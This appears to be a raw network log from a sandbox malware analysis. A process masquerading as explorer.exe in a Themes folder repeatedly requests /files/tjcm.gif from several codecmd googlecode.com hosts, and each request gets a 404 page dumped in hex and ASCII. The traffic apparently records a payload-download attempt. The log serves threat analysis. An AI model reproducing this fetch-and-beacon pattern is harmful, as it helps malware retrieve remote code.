                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:45 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:45.267802000 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          17192.168.2.44975364.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:46.783688068 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:47.504919052 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:47 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:47.504941940 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          18192.168.2.44975466.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:48.602169037 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:49.311116934 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:49 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:49.311146975 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          19192.168.2.44975574.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:50.419233084 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:51.129062891 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:51 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:51.129125118 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          20192.168.2.44975664.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:52.337215900 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:53.101898909 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:53 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:53.101923943 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          21192.168.2.44975766.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:54.070306063 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:54.780528069 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:54 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:54.780591011 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          22192.168.2.44975874.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:55.696208000 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:56.431293964 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:56 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:56.431333065 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                                                                          Jan 13, 2025 13:17:56.431345940 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
